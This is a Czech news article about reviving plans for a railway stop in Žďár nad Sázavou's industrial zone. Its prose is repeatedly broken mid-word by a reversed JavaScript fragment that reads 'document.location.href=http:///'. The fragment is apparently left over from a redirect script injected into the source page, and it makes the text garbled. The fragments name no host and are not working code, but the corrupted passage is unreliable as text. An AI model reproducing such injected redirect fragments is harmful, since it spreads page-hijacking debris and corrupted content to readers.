Rainbow page separator

Žďár opět oprášil myšlenku zastávky v průmyslové zóně

Pondělí, 11. ledna 2016

Železnice, koleje, vlak

Žďár nad Sázavou / V souvislosti s rozvíjením dalších pracovních příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostí ve žďárském okrese po ukončení těžby uranové rudy v dole Rožná 1 v Dolní Rožínce, k čemuž má dojít v roce 2017, znovu vyvstala otázka vybudování železniční zastávky v průmyslové zóně ve Žďáře nad Sázavou. „Z hlediska zaměstnanosti je důležité, aby v regionu fungovala dopravní dostupnost, a pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to jsme znovu otevřeli myšlenku výstavby zastávky v průmyslové zóně. Jednou z podmínek jejího vybudování je buď přemostění, anebo podchod pod silnicí I/19,“ uvedl starosta Žďáru nad Sázavou Zdeněk Navrátil.
Otázkou zatím zůstává, kdo by měl být inves[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torem stavební akce. Zda Ředitelství silnic a dálnic (ŘSD) ČR, jež je správcem státní komunikace, Správa železniční a dopravní cesty, která by vybudovala zastávku, anebo Žďár jako provozovatel průmyslové zóny. O [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom by se mělo teprve jednat.
Vybudování zastávky se ve Žďáře opakovaně řešilo už před lety, naposledy [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bylo v roce 2013. Záměr ztroskotal na penězích, Žďár nadchod či podchod v řádu desítek milionů korun vyhodnotil za nadměrně finančně náročný.